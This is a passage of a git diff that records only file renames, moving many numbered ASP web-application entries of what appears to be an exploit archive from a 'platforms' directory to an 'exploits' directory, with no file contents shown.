b/exploits/asp/webapps/15777.txt similarity index 100% rename from platforms/asp/webapps/15777.txt rename to exploits/asp/webapps/15777.txt diff --git a/platforms/asp/webapps/15784.txt b/exploits/asp/webapps/15784.txt similarity index 100% rename from platforms/asp/webapps/15784.txt rename to exploits/asp/webapps/15784.txt diff --git a/platforms/asp/webapps/1589.pl b/exploits/asp/webapps/1589.pl similarity index 100% rename from platforms/asp/webapps/1589.pl rename to exploits/asp/webapps/1589.pl diff --git a/platforms/asp/webapps/1597.pl b/exploits/asp/webapps/1597.pl similarity index 100% rename from platforms/asp/webapps/1597.pl rename to exploits/asp/webapps/1597.pl diff --git a/platforms/asp/webapps/16178.txt b/exploits/asp/webapps/16178.txt similarity index 100% rename from platforms/asp/webapps/16178.txt rename to exploits/asp/webapps/16178.txt diff --git a/platforms/asp/webapps/16179.txt b/exploits/asp/webapps/16179.txt similarity index 100% rename from platforms/asp/webapps/16179.txt rename to exploits/asp/webapps/16179.txt diff --git a/platforms/asp/webapps/16205.txt b/exploits/asp/webapps/16205.txt similarity index 100% rename from platforms/asp/webapps/16205.txt rename to exploits/asp/webapps/16205.txt diff --git a/platforms/asp/webapps/1623.pl b/exploits/asp/webapps/1623.pl similarity index 100% rename from platforms/asp/webapps/1623.pl rename to exploits/asp/webapps/1623.pl diff --git a/platforms/asp/webapps/16241.txt b/exploits/asp/webapps/16241.txt similarity index 100% rename from platforms/asp/webapps/16241.txt rename to exploits/asp/webapps/16241.txt diff --git a/platforms/asp/webapps/16941.txt b/exploits/asp/webapps/16941.txt similarity index 100% rename from platforms/asp/webapps/16941.txt rename to exploits/asp/webapps/16941.txt diff --git a/platforms/asp/webapps/16953.txt b/exploits/asp/webapps/16953.txt similarity index 100% rename from platforms/asp/webapps/16953.txt rename to exploits/asp/webapps/16953.txt diff --git a/platforms/asp/webapps/16955.txt b/exploits/asp/webapps/16955.txt similarity index 100% rename from platforms/asp/webapps/16955.txt rename to exploits/asp/webapps/16955.txt diff --git a/platforms/asp/webapps/16962.txt b/exploits/asp/webapps/16962.txt similarity index 100% rename from platforms/asp/webapps/16962.txt rename to exploits/asp/webapps/16962.txt diff --git a/platforms/asp/webapps/16975.txt b/exploits/asp/webapps/16975.txt similarity index 100% rename from platforms/asp/webapps/16975.txt rename to exploits/asp/webapps/16975.txt diff --git a/platforms/asp/webapps/1700.pl b/exploits/asp/webapps/1700.pl similarity index 100% rename from platforms/asp/webapps/1700.pl rename to exploits/asp/webapps/1700.pl diff --git a/platforms/asp/webapps/17011.txt b/exploits/asp/webapps/17011.txt similarity index 100% rename from platforms/asp/webapps/17011.txt rename to exploits/asp/webapps/17011.txt diff --git a/platforms/asp/webapps/17015.txt b/exploits/asp/webapps/17015.txt similarity index 100% rename from platforms/asp/webapps/17015.txt rename to exploits/asp/webapps/17015.txt diff --git a/platforms/asp/webapps/17016.txt b/exploits/asp/webapps/17016.txt similarity index 100% rename from platforms/asp/webapps/17016.txt rename to exploits/asp/webapps/17016.txt diff --git a/platforms/asp/webapps/17036.txt b/exploits/asp/webapps/17036.txt similarity index 100% rename from platforms/asp/webapps/17036.txt rename to exploits/asp/webapps/17036.txt diff --git a/platforms/asp/webapps/17081.txt b/exploits/asp/webapps/17081.txt similarity index 100% rename from platforms/asp/webapps/17081.txt rename to exploits/asp/webapps/17081.txt diff --git a/platforms/asp/webapps/1714.txt b/exploits/asp/webapps/1714.txt similarity index 100% rename from platforms/asp/webapps/1714.txt rename to exploits/asp/webapps/1714.txt diff --git a/platforms/asp/webapps/17176.txt b/exploits/asp/webapps/17176.txt similarity index 100% rename from platforms/asp/webapps/17176.txt rename to exploits/asp/webapps/17176.txt diff --git a/platforms/asp/webapps/17228.txt b/exploits/asp/webapps/17228.txt similarity index 100% rename from platforms/asp/webapps/17228.txt rename to exploits/asp/webapps/17228.txt diff --git a/platforms/asp/webapps/17242.txt b/exploits/asp/webapps/17242.txt similarity index 100% rename from platforms/asp/webapps/17242.txt rename to exploits/asp/webapps/17242.txt diff --git a/platforms/asp/webapps/17375.txt b/exploits/asp/webapps/17375.txt similarity index 100% rename from platforms/asp/webapps/17375.txt rename to exploits/asp/webapps/17375.txt diff --git a/platforms/asp/webapps/17472.txt b/exploits/asp/webapps/17472.txt similarity index 100% rename from platforms/asp/webapps/17472.txt rename to exploits/asp/webapps/17472.txt diff --git a/platforms/asp/webapps/17475.txt b/exploits/asp/webapps/17475.txt similarity index 100% rename from platforms/asp/webapps/17475.txt rename to exploits/asp/webapps/17475.txt diff --git a/platforms/asp/webapps/17478.txt b/exploits/asp/webapps/17478.txt similarity index 100% rename from platforms/asp/webapps/17478.txt rename to exploits/asp/webapps/17478.txt diff --git a/platforms/asp/webapps/17479.txt b/exploits/asp/webapps/17479.txt similarity index 100% rename from platforms/asp/webapps/17479.txt rename to exploits/asp/webapps/17479.txt diff --git a/platforms/asp/webapps/17480.txt b/exploits/asp/webapps/17480.txt similarity index 100% rename from platforms/asp/webapps/17480.txt rename to exploits/asp/webapps/17480.txt diff --git a/platforms/asp/webapps/17481.txt b/exploits/asp/webapps/17481.txt similarity index 100% rename from platforms/asp/webapps/17481.txt rename to exploits/asp/webapps/17481.txt diff --git a/platforms/asp/webapps/17482.txt b/exploits/asp/webapps/17482.txt similarity index 100% rename from platforms/asp/webapps/17482.txt rename to exploits/asp/webapps/17482.txt diff --git a/platforms/asp/webapps/17493.txt b/exploits/asp/webapps/17493.txt similarity index 100% rename from platforms/asp/webapps/17493.txt rename to exploits/asp/webapps/17493.txt diff --git a/platforms/asp/webapps/1759.txt b/exploits/asp/webapps/1759.txt similarity index 100% rename from platforms/asp/webapps/1759.txt rename to exploits/asp/webapps/1759.txt diff --git a/platforms/asp/webapps/17711.txt b/exploits/asp/webapps/17711.txt similarity index 100% rename from platforms/asp/webapps/17711.txt rename to exploits/asp/webapps/17711.txt diff --git a/platforms/asp/webapps/17733.txt b/exploits/asp/webapps/17733.txt similarity index 100% rename from platforms/asp/webapps/17733.txt rename to exploits/asp/webapps/17733.txt diff --git a/platforms/asp/webapps/17900.txt b/exploits/asp/webapps/17900.txt similarity index 100% rename from platforms/asp/webapps/17900.txt rename to exploits/asp/webapps/17900.txt diff --git a/platforms/asp/webapps/17921.txt b/exploits/asp/webapps/17921.txt similarity index 100% rename from platforms/asp/webapps/17921.txt rename to exploits/asp/webapps/17921.txt diff --git a/platforms/asp/webapps/18009.txt b/exploits/asp/webapps/18009.txt similarity index 100% rename from platforms/asp/webapps/18009.txt rename to exploits/asp/webapps/18009.txt diff --git a/platforms/asp/webapps/1807.txt b/exploits/asp/webapps/1807.txt similarity index 100% rename from platforms/asp/webapps/1807.txt rename to exploits/asp/webapps/1807.txt diff --git a/platforms/asp/webapps/1833.txt b/exploits/asp/webapps/1833.txt similarity index 100% rename from platforms/asp/webapps/1833.txt rename to exploits/asp/webapps/1833.txt diff --git a/platforms/asp/webapps/1834.asp b/exploits/asp/webapps/1834.asp similarity index 100% rename from platforms/asp/webapps/1834.asp rename to exploits/asp/webapps/1834.asp diff --git a/platforms/asp/webapps/1836.txt b/exploits/asp/webapps/1836.txt similarity index 100% rename from platforms/asp/webapps/1836.txt rename to exploits/asp/webapps/1836.txt diff --git a/platforms/asp/webapps/1837.pl b/exploits/asp/webapps/1837.pl similarity index 100% rename from platforms/asp/webapps/1837.pl rename to exploits/asp/webapps/1837.pl diff --git a/platforms/asp/webapps/18394.txt b/exploits/asp/webapps/18394.txt similarity index 100% rename from platforms/asp/webapps/18394.txt rename to exploits/asp/webapps/18394.txt diff --git a/platforms/asp/webapps/18395.txt b/exploits/asp/webapps/18395.txt similarity index 100% rename from platforms/asp/webapps/18395.txt rename to exploits/asp/webapps/18395.txt diff --git a/platforms/asp/webapps/1840.txt b/exploits/asp/webapps/1840.txt similarity index 100% rename from platforms/asp/webapps/1840.txt rename to exploits/asp/webapps/1840.txt diff --git a/platforms/asp/webapps/18405.txt b/exploits/asp/webapps/18405.txt similarity index 100% rename from platforms/asp/webapps/18405.txt rename to exploits/asp/webapps/18405.txt diff --git a/platforms/asp/webapps/18447.txt b/exploits/asp/webapps/18447.txt similarity index 100% rename from platforms/asp/webapps/18447.txt rename to exploits/asp/webapps/18447.txt diff --git a/platforms/asp/webapps/1845.txt b/exploits/asp/webapps/1845.txt similarity index 100% rename from platforms/asp/webapps/1845.txt rename to exploits/asp/webapps/1845.txt diff --git a/platforms/asp/webapps/1849.html b/exploits/asp/webapps/1849.html similarity index 100% rename from platforms/asp/webapps/1849.html rename to exploits/asp/webapps/1849.html diff --git a/platforms/asp/webapps/1850.html b/exploits/asp/webapps/1850.html similarity index 100% rename from platforms/asp/webapps/1850.html rename to exploits/asp/webapps/1850.html diff --git a/platforms/asp/webapps/18566.txt b/exploits/asp/webapps/18566.txt similarity index 100% rename from platforms/asp/webapps/18566.txt rename to exploits/asp/webapps/18566.txt diff --git a/platforms/asp/webapps/1859.html b/exploits/asp/webapps/1859.html similarity index 100% rename from platforms/asp/webapps/1859.html rename to exploits/asp/webapps/1859.html diff --git a/platforms/asp/webapps/18651.txt b/exploits/asp/webapps/18651.txt similarity index 100% rename from platforms/asp/webapps/18651.txt rename to exploits/asp/webapps/18651.txt diff --git a/platforms/asp/webapps/1873.txt b/exploits/asp/webapps/1873.txt similarity index 100% rename from platforms/asp/webapps/1873.txt rename to exploits/asp/webapps/1873.txt diff --git a/platforms/asp/webapps/18802.txt b/exploits/asp/webapps/18802.txt similarity index 100% rename from platforms/asp/webapps/18802.txt rename to exploits/asp/webapps/18802.txt diff --git a/platforms/asp/webapps/1884.html b/exploits/asp/webapps/1884.html similarity index 100% rename from platforms/asp/webapps/1884.html rename to exploits/asp/webapps/1884.html diff --git a/platforms/asp/webapps/18840.txt b/exploits/asp/webapps/18840.txt similarity index 100% rename from platforms/asp/webapps/18840.txt rename to exploits/asp/webapps/18840.txt diff --git a/platforms/asp/webapps/1893.txt b/exploits/asp/webapps/1893.txt similarity index 100% rename from platforms/asp/webapps/1893.txt rename to exploits/asp/webapps/1893.txt diff --git a/platforms/asp/webapps/1900.txt b/exploits/asp/webapps/1900.txt similarity index 100% rename from platforms/asp/webapps/1900.txt rename to exploits/asp/webapps/1900.txt diff --git a/platforms/asp/webapps/1930.txt b/exploits/asp/webapps/1930.txt similarity index 100% rename from platforms/asp/webapps/1930.txt rename to exploits/asp/webapps/1930.txt diff --git a/platforms/asp/webapps/1931.txt b/exploits/asp/webapps/1931.txt similarity index 100% rename from platforms/asp/webapps/1931.txt rename to exploits/asp/webapps/1931.txt diff --git a/platforms/asp/webapps/19394.txt b/exploits/asp/webapps/19394.txt similarity index 100% rename from platforms/asp/webapps/19394.txt rename to exploits/asp/webapps/19394.txt diff --git a/platforms/asp/webapps/1987.txt b/exploits/asp/webapps/1987.txt similarity index 100% rename from platforms/asp/webapps/1987.txt rename to exploits/asp/webapps/1987.txt diff --git a/platforms/asp/webapps/20035.js b/exploits/asp/webapps/20035.js similarity index 100% rename from platforms/asp/webapps/20035.js rename to exploits/asp/webapps/20035.js diff --git a/platforms/asp/webapps/20864.txt b/exploits/asp/webapps/20864.txt similarity index 100% rename from platforms/asp/webapps/20864.txt rename to exploits/asp/webapps/20864.txt diff --git a/platforms/asp/webapps/20987.txt b/exploits/asp/webapps/20987.txt similarity index 100% rename from platforms/asp/webapps/20987.txt rename to exploits/asp/webapps/20987.txt diff --git a/platforms/asp/webapps/21085.txt b/exploits/asp/webapps/21085.txt similarity index 100% rename from platforms/asp/webapps/21085.txt rename to exploits/asp/webapps/21085.txt diff --git a/platforms/asp/webapps/21272.txt b/exploits/asp/webapps/21272.txt similarity index 100% rename from platforms/asp/webapps/21272.txt rename to exploits/asp/webapps/21272.txt diff --git a/platforms/asp/webapps/21308.txt b/exploits/asp/webapps/21308.txt similarity index 100% rename from platforms/asp/webapps/21308.txt rename to exploits/asp/webapps/21308.txt diff --git a/platforms/asp/webapps/2138.txt b/exploits/asp/webapps/2138.txt similarity index 100% rename from platforms/asp/webapps/2138.txt rename to exploits/asp/webapps/2138.txt diff --git a/platforms/asp/webapps/21400.txt b/exploits/asp/webapps/21400.txt similarity index 100% rename from platforms/asp/webapps/21400.txt rename to exploits/asp/webapps/21400.txt diff --git a/platforms/asp/webapps/21434.txt b/exploits/asp/webapps/21434.txt similarity index 100% rename from platforms/asp/webapps/21434.txt rename to exploits/asp/webapps/21434.txt diff --git a/platforms/asp/webapps/21455.txt b/exploits/asp/webapps/21455.txt similarity index 100% rename from platforms/asp/webapps/21455.txt rename to exploits/asp/webapps/21455.txt diff --git a/platforms/asp/webapps/21457.txt b/exploits/asp/webapps/21457.txt similarity index 100% rename from platforms/asp/webapps/21457.txt rename to exploits/asp/webapps/21457.txt diff --git a/platforms/asp/webapps/21464.txt b/exploits/asp/webapps/21464.txt similarity index 100% rename from platforms/asp/webapps/21464.txt rename to exploits/asp/webapps/21464.txt diff --git a/platforms/asp/webapps/2150.txt b/exploits/asp/webapps/2150.txt similarity index 100% rename from platforms/asp/webapps/2150.txt rename to exploits/asp/webapps/2150.txt diff --git a/platforms/asp/webapps/21702.txt b/exploits/asp/webapps/21702.txt similarity index 100% rename from platforms/asp/webapps/21702.txt rename to exploits/asp/webapps/21702.txt diff --git a/platforms/asp/webapps/21766.txt b/exploits/asp/webapps/21766.txt similarity index 100% rename from platforms/asp/webapps/21766.txt rename to exploits/asp/webapps/21766.txt diff --git a/platforms/asp/webapps/2186.txt b/exploits/asp/webapps/2186.txt similarity index 100% rename from platforms/asp/webapps/2186.txt rename to exploits/asp/webapps/2186.txt diff --git a/platforms/asp/webapps/21914.txt b/exploits/asp/webapps/21914.txt similarity index 100% rename from platforms/asp/webapps/21914.txt rename to exploits/asp/webapps/21914.txt diff --git a/platforms/asp/webapps/21920.txt b/exploits/asp/webapps/21920.txt similarity index 100% rename from platforms/asp/webapps/21920.txt rename to exploits/asp/webapps/21920.txt diff --git a/platforms/asp/webapps/21924.txt b/exploits/asp/webapps/21924.txt similarity index 100% rename from platforms/asp/webapps/21924.txt rename to exploits/asp/webapps/21924.txt diff --git a/platforms/asp/webapps/21925.txt b/exploits/asp/webapps/21925.txt similarity index 100% rename from platforms/asp/webapps/21925.txt rename to exploits/asp/webapps/21925.txt diff --git a/platforms/asp/webapps/2228.txt b/exploits/asp/webapps/2228.txt similarity index 100% rename from platforms/asp/webapps/2228.txt rename to exploits/asp/webapps/2228.txt diff --git a/platforms/asp/webapps/2230.txt b/exploits/asp/webapps/2230.txt similarity index 100% rename from platforms/asp/webapps/2230.txt rename to exploits/asp/webapps/2230.txt diff --git a/platforms/asp/webapps/22357.txt b/exploits/asp/webapps/22357.txt similarity index 100% rename from platforms/asp/webapps/22357.txt rename to exploits/asp/webapps/22357.txt diff --git a/platforms/asp/webapps/22436.txt b/exploits/asp/webapps/22436.txt similarity index 100% rename from platforms/asp/webapps/22436.txt rename to exploits/asp/webapps/22436.txt diff --git a/platforms/asp/webapps/22437.txt b/exploits/asp/webapps/22437.txt similarity index 100% rename from platforms/asp/webapps/22437.txt rename to exploits/asp/webapps/22437.txt diff --git a/platforms/asp/webapps/22484.txt b/exploits/asp/webapps/22484.txt similarity index 100% rename from platforms/asp/webapps/22484.txt rename to exploits/asp/webapps/22484.txt diff --git a/platforms/asp/webapps/22487.txt b/exploits/asp/webapps/22487.txt similarity index 100% rename from platforms/asp/webapps/22487.txt rename to exploits/asp/webapps/22487.txt diff --git a/platforms/asp/webapps/22507.txt b/exploits/asp/webapps/22507.txt similarity index 100% rename from platforms/asp/webapps/22507.txt rename to exploits/asp/webapps/22507.txt diff --git a/platforms/asp/webapps/22513.txt b/exploits/asp/webapps/22513.txt similarity index 100% rename from platforms/asp/webapps/22513.txt rename to exploits/asp/webapps/22513.txt diff --git a/platforms/asp/webapps/22529.txt b/exploits/asp/webapps/22529.txt similarity index 100% rename from platforms/asp/webapps/22529.txt rename to exploits/asp/webapps/22529.txt diff --git a/platforms/asp/webapps/22554.txt b/exploits/asp/webapps/22554.txt similarity index 100% rename from platforms/asp/webapps/22554.txt rename to exploits/asp/webapps/22554.txt diff --git a/platforms/asp/webapps/22555.txt b/exploits/asp/webapps/22555.txt similarity index 100% rename from platforms/asp/webapps/22555.txt rename to exploits/asp/webapps/22555.txt diff --git a/platforms/asp/webapps/22583.pl b/exploits/asp/webapps/22583.pl similarity index 100% rename from platforms/asp/webapps/22583.pl rename to exploits/asp/webapps/22583.pl diff --git a/platforms/asp/webapps/22639.txt b/exploits/asp/webapps/22639.txt similarity index 100% rename from platforms/asp/webapps/22639.txt rename to exploits/asp/webapps/22639.txt diff --git a/platforms/asp/webapps/22673.txt b/exploits/asp/webapps/22673.txt similarity index 100% rename from platforms/asp/webapps/22673.txt rename to exploits/asp/webapps/22673.txt diff --git a/platforms/asp/webapps/22697.asp b/exploits/asp/webapps/22697.asp similarity index 100% rename from platforms/asp/webapps/22697.asp rename to exploits/asp/webapps/22697.asp diff --git a/platforms/asp/webapps/22698.pl b/exploits/asp/webapps/22698.pl similarity index 100% rename from platforms/asp/webapps/22698.pl rename to exploits/asp/webapps/22698.pl diff --git a/platforms/asp/webapps/22724.txt b/exploits/asp/webapps/22724.txt similarity index 100% rename from platforms/asp/webapps/22724.txt rename to exploits/asp/webapps/22724.txt diff --git a/platforms/asp/webapps/22730.txt b/exploits/asp/webapps/22730.txt similarity index 100% rename from platforms/asp/webapps/22730.txt rename to exploits/asp/webapps/22730.txt diff --git a/platforms/asp/webapps/22731.txt b/exploits/asp/webapps/22731.txt similarity index 100% rename from platforms/asp/webapps/22731.txt rename to exploits/asp/webapps/22731.txt diff --git a/platforms/asp/webapps/22744.txt b/exploits/asp/webapps/22744.txt similarity index 100% rename from platforms/asp/webapps/22744.txt rename to exploits/asp/webapps/22744.txt diff --git a/platforms/asp/webapps/22746.txt b/exploits/asp/webapps/22746.txt similarity index 100% rename from platforms/asp/webapps/22746.txt rename to exploits/asp/webapps/22746.txt diff --git a/platforms/asp/webapps/22747.txt b/exploits/asp/webapps/22747.txt similarity index 100% rename from platforms/asp/webapps/22747.txt rename to exploits/asp/webapps/22747.txt diff --git a/platforms/asp/webapps/22778.txt b/exploits/asp/webapps/22778.txt similarity index 100% rename from platforms/asp/webapps/22778.txt rename to exploits/asp/webapps/22778.txt diff --git a/platforms/asp/webapps/22864.txt b/exploits/asp/webapps/22864.txt similarity index 100% rename from platforms/asp/webapps/22864.txt rename to exploits/asp/webapps/22864.txt diff --git a/platforms/asp/webapps/22865.txt b/exploits/asp/webapps/22865.txt similarity index 100% rename from platforms/asp/webapps/22865.txt rename to exploits/asp/webapps/22865.txt diff --git a/platforms/asp/webapps/22866.txt b/exploits/asp/webapps/22866.txt similarity index 100% rename from platforms/asp/webapps/22866.txt rename to exploits/asp/webapps/22866.txt diff --git a/platforms/asp/webapps/22868.txt b/exploits/asp/webapps/22868.txt similarity index 100% rename from platforms/asp/webapps/22868.txt rename to exploits/asp/webapps/22868.txt diff --git a/platforms/asp/webapps/2287.txt b/exploits/asp/webapps/2287.txt similarity index 100% rename from platforms/asp/webapps/2287.txt rename to exploits/asp/webapps/2287.txt diff --git a/platforms/asp/webapps/22885.asp b/exploits/asp/webapps/22885.asp similarity index 100% rename from platforms/asp/webapps/22885.asp rename to exploits/asp/webapps/22885.asp diff --git a/platforms/asp/webapps/22888.pl b/exploits/asp/webapps/22888.pl similarity index 100% rename from platforms/asp/webapps/22888.pl rename to exploits/asp/webapps/22888.pl diff --git a/platforms/asp/webapps/22889.pl b/exploits/asp/webapps/22889.pl similarity index 100% rename from platforms/asp/webapps/22889.pl rename to exploits/asp/webapps/22889.pl diff --git a/platforms/asp/webapps/22895.txt b/exploits/asp/webapps/22895.txt similarity index 100% rename from platforms/asp/webapps/22895.txt rename to exploits/asp/webapps/22895.txt diff --git a/platforms/asp/webapps/22921.txt b/exploits/asp/webapps/22921.txt similarity index 100% rename from platforms/asp/webapps/22921.txt rename to exploits/asp/webapps/22921.txt diff --git a/platforms/asp/webapps/2294.txt b/exploits/asp/webapps/2294.txt similarity index 100% rename from platforms/asp/webapps/2294.txt rename to exploits/asp/webapps/2294.txt diff --git a/platforms/asp/webapps/2296.txt b/exploits/asp/webapps/2296.txt similarity index 100% rename from platforms/asp/webapps/2296.txt rename to exploits/asp/webapps/2296.txt diff --git a/platforms/asp/webapps/22992.txt b/exploits/asp/webapps/22992.txt similarity index 100% rename from platforms/asp/webapps/22992.txt rename to exploits/asp/webapps/22992.txt diff --git a/platforms/asp/webapps/23005.txt b/exploits/asp/webapps/23005.txt similarity index 100% rename from platforms/asp/webapps/23005.txt rename to exploits/asp/webapps/23005.txt diff --git a/platforms/asp/webapps/23032.txt b/exploits/asp/webapps/23032.txt similarity index 100% rename from platforms/asp/webapps/23032.txt rename to exploits/asp/webapps/23032.txt diff --git a/platforms/asp/webapps/23033.txt b/exploits/asp/webapps/23033.txt similarity index 100% rename from platforms/asp/webapps/23033.txt rename to exploits/asp/webapps/23033.txt diff --git a/platforms/asp/webapps/23035.txt b/exploits/asp/webapps/23035.txt similarity index 100% rename from platforms/asp/webapps/23035.txt rename to exploits/asp/webapps/23035.txt diff --git a/platforms/asp/webapps/23055.txt b/exploits/asp/webapps/23055.txt similarity index 100% rename from platforms/asp/webapps/23055.txt rename to exploits/asp/webapps/23055.txt diff --git a/platforms/asp/webapps/2306.txt b/exploits/asp/webapps/2306.txt similarity index 100% rename from platforms/asp/webapps/2306.txt rename to exploits/asp/webapps/2306.txt diff --git a/platforms/asp/webapps/23120.txt b/exploits/asp/webapps/23120.txt similarity index 100% rename from platforms/asp/webapps/23120.txt rename to exploits/asp/webapps/23120.txt diff --git a/platforms/asp/webapps/23195.txt b/exploits/asp/webapps/23195.txt similarity index 100% rename from platforms/asp/webapps/23195.txt rename to exploits/asp/webapps/23195.txt diff --git a/platforms/asp/webapps/23326.txt b/exploits/asp/webapps/23326.txt similarity index 100% rename from platforms/asp/webapps/23326.txt rename to exploits/asp/webapps/23326.txt diff --git a/platforms/asp/webapps/23331.txt b/exploits/asp/webapps/23331.txt similarity index 100% rename from platforms/asp/webapps/23331.txt rename to exploits/asp/webapps/23331.txt diff --git a/platforms/asp/webapps/23335.txt b/exploits/asp/webapps/23335.txt similarity index 100% rename from platforms/asp/webapps/23335.txt rename to exploits/asp/webapps/23335.txt diff --git a/platforms/asp/webapps/23407.txt b/exploits/asp/webapps/23407.txt similarity index 100% rename from platforms/asp/webapps/23407.txt rename to exploits/asp/webapps/23407.txt diff --git a/platforms/asp/webapps/23408.txt b/exploits/asp/webapps/23408.txt similarity index 100% rename from platforms/asp/webapps/23408.txt rename to exploits/asp/webapps/23408.txt diff --git a/platforms/asp/webapps/23415.txt b/exploits/asp/webapps/23415.txt similarity index 100% rename from platforms/asp/webapps/23415.txt rename to exploits/asp/webapps/23415.txt diff --git a/platforms/asp/webapps/23440.txt b/exploits/asp/webapps/23440.txt similarity index 100% rename from platforms/asp/webapps/23440.txt rename to exploits/asp/webapps/23440.txt diff --git a/platforms/asp/webapps/23515.txt b/exploits/asp/webapps/23515.txt similarity index 100% rename from platforms/asp/webapps/23515.txt rename to exploits/asp/webapps/23515.txt diff --git a/platforms/asp/webapps/23516.txt b/exploits/asp/webapps/23516.txt similarity index 100% rename from platforms/asp/webapps/23516.txt rename to exploits/asp/webapps/23516.txt diff --git a/platforms/asp/webapps/23547.txt b/exploits/asp/webapps/23547.txt similarity index 100% rename from platforms/asp/webapps/23547.txt rename to exploits/asp/webapps/23547.txt diff --git a/platforms/asp/webapps/23561.txt b/exploits/asp/webapps/23561.txt similarity index 100% rename from platforms/asp/webapps/23561.txt rename to exploits/asp/webapps/23561.txt diff --git a/platforms/asp/webapps/23571.txt b/exploits/asp/webapps/23571.txt similarity index 100% rename from platforms/asp/webapps/23571.txt rename to exploits/asp/webapps/23571.txt diff --git a/platforms/asp/webapps/2362.txt b/exploits/asp/webapps/2362.txt similarity index 100% rename from platforms/asp/webapps/2362.txt rename to exploits/asp/webapps/2362.txt diff --git a/platforms/asp/webapps/23635.txt b/exploits/asp/webapps/23635.txt similarity index 100% rename from platforms/asp/webapps/23635.txt rename to exploits/asp/webapps/23635.txt diff --git a/platforms/asp/webapps/23676.txt b/exploits/asp/webapps/23676.txt similarity index 100% rename from platforms/asp/webapps/23676.txt rename to exploits/asp/webapps/23676.txt diff --git a/platforms/asp/webapps/23677.txt b/exploits/asp/webapps/23677.txt similarity index 100% rename from platforms/asp/webapps/23677.txt rename to exploits/asp/webapps/23677.txt diff --git a/platforms/asp/webapps/23696.pl b/exploits/asp/webapps/23696.pl similarity index 100% rename from platforms/asp/webapps/23696.pl rename to exploits/asp/webapps/23696.pl diff --git a/platforms/asp/webapps/23702.txt b/exploits/asp/webapps/23702.txt similarity index 100% rename from platforms/asp/webapps/23702.txt rename to exploits/asp/webapps/23702.txt diff --git a/platforms/asp/webapps/23703.txt b/exploits/asp/webapps/23703.txt similarity index 100% rename from platforms/asp/webapps/23703.txt rename to exploits/asp/webapps/23703.txt diff --git a/platforms/asp/webapps/23704.txt b/exploits/asp/webapps/23704.txt similarity index 100% rename from platforms/asp/webapps/23704.txt rename to exploits/asp/webapps/23704.txt diff --git a/platforms/asp/webapps/2371.txt b/exploits/asp/webapps/2371.txt similarity index 100% rename from platforms/asp/webapps/2371.txt rename to exploits/asp/webapps/2371.txt diff --git a/platforms/asp/webapps/23729.txt b/exploits/asp/webapps/23729.txt similarity index 100% rename from platforms/asp/webapps/23729.txt rename to exploits/asp/webapps/23729.txt diff --git a/platforms/asp/webapps/23791.txt b/exploits/asp/webapps/23791.txt similarity index 100% rename from platforms/asp/webapps/23791.txt rename to exploits/asp/webapps/23791.txt diff --git a/platforms/asp/webapps/23813.txt b/exploits/asp/webapps/23813.txt similarity index 100% rename from platforms/asp/webapps/23813.txt rename to exploits/asp/webapps/23813.txt diff --git a/platforms/asp/webapps/2384.txt b/exploits/asp/webapps/2384.txt similarity index 100% rename from platforms/asp/webapps/2384.txt rename to exploits/asp/webapps/2384.txt diff --git a/platforms/asp/webapps/2385.txt b/exploits/asp/webapps/2385.txt similarity index 100% rename from platforms/asp/webapps/2385.txt rename to exploits/asp/webapps/2385.txt diff --git a/platforms/asp/webapps/23851.txt b/exploits/asp/webapps/23851.txt similarity index 100% rename from platforms/asp/webapps/23851.txt rename to exploits/asp/webapps/23851.txt diff --git a/platforms/asp/webapps/23852.txt b/exploits/asp/webapps/23852.txt similarity index 100% rename from platforms/asp/webapps/23852.txt rename to exploits/asp/webapps/23852.txt diff --git a/platforms/asp/webapps/23853.txt b/exploits/asp/webapps/23853.txt similarity index 100% rename from platforms/asp/webapps/23853.txt rename to exploits/asp/webapps/23853.txt diff --git a/platforms/asp/webapps/23854.txt b/exploits/asp/webapps/23854.txt similarity index 100% rename from platforms/asp/webapps/23854.txt rename to exploits/asp/webapps/23854.txt diff --git a/platforms/asp/webapps/23857.txt b/exploits/asp/webapps/23857.txt similarity index 100% rename from platforms/asp/webapps/23857.txt rename to exploits/asp/webapps/23857.txt diff --git a/platforms/asp/webapps/23858.txt b/exploits/asp/webapps/23858.txt similarity index 100% rename from platforms/asp/webapps/23858.txt rename to exploits/asp/webapps/23858.txt diff --git a/platforms/asp/webapps/23859.txt b/exploits/asp/webapps/23859.txt similarity index 100% rename from platforms/asp/webapps/23859.txt rename to exploits/asp/webapps/23859.txt diff --git a/platforms/asp/webapps/2386.txt b/exploits/asp/webapps/2386.txt similarity index 100% rename from platforms/asp/webapps/2386.txt rename to exploits/asp/webapps/2386.txt diff --git a/platforms/asp/webapps/23860.txt b/exploits/asp/webapps/23860.txt similarity index 100% rename from platforms/asp/webapps/23860.txt rename to exploits/asp/webapps/23860.txt diff --git a/platforms/asp/webapps/23861.txt b/exploits/asp/webapps/23861.txt similarity index 100% rename from platforms/asp/webapps/23861.txt rename to exploits/asp/webapps/23861.txt diff --git a/platforms/asp/webapps/23862.txt b/exploits/asp/webapps/23862.txt similarity index 100% rename from platforms/asp/webapps/23862.txt rename to exploits/asp/webapps/23862.txt diff --git a/platforms/asp/webapps/23863.txt b/exploits/asp/webapps/23863.txt similarity index 100% rename from platforms/asp/webapps/23863.txt rename to exploits/asp/webapps/23863.txt diff --git a/platforms/asp/webapps/2387.txt b/exploits/asp/webapps/2387.txt similarity index 100% rename from platforms/asp/webapps/2387.txt rename to exploits/asp/webapps/2387.txt diff --git a/platforms/asp/webapps/23891.txt b/exploits/asp/webapps/23891.txt similarity index 100% rename from platforms/asp/webapps/23891.txt rename to exploits/asp/webapps/23891.txt diff --git a/platforms/asp/webapps/23895.txt b/exploits/asp/webapps/23895.txt similarity index 100% rename from platforms/asp/webapps/23895.txt rename to exploits/asp/webapps/23895.txt diff --git a/platforms/asp/webapps/23898.txt b/exploits/asp/webapps/23898.txt similarity index 100% rename from platforms/asp/webapps/23898.txt rename to exploits/asp/webapps/23898.txt diff --git a/platforms/asp/webapps/23899.txt b/exploits/asp/webapps/23899.txt similarity index 100% rename from platforms/asp/webapps/23899.txt rename to exploits/asp/webapps/23899.txt diff --git a/platforms/asp/webapps/2395.txt b/exploits/asp/webapps/2395.txt similarity index 100% rename from platforms/asp/webapps/2395.txt rename to exploits/asp/webapps/2395.txt diff --git a/platforms/asp/webapps/23968.txt b/exploits/asp/webapps/23968.txt similarity index 100% rename from platforms/asp/webapps/23968.txt rename to exploits/asp/webapps/23968.txt diff --git a/platforms/asp/webapps/24039.txt b/exploits/asp/webapps/24039.txt similarity index 100% rename from platforms/asp/webapps/24039.txt rename to exploits/asp/webapps/24039.txt diff --git a/platforms/asp/webapps/24049.txt b/exploits/asp/webapps/24049.txt similarity index 100% rename from platforms/asp/webapps/24049.txt rename to 